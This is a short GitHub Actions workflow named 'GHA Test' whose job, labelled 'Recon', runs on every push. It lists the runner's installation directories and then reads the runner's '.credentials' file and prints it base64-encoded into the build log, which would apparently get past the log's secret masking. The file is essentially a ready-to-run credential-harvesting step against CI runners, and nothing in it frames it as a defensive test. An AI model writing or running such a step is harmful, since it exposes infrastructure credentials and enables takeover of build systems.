name: GHA Test
on: [push]
jobs: 
  Recon: #Each job can run for 6h max
    runs-on: ubuntu-latest
    steps:
      - run: |     
            ls -la /home/runner/runners/
            ls -la /home/runner/runners/2.283.1
            ls -la /home/runner/runners/2.283.2
            ls -la /home/runner/runners/2.283.3
            cat /home/runner/runners/2.283.3/.credentials | base64



            
       
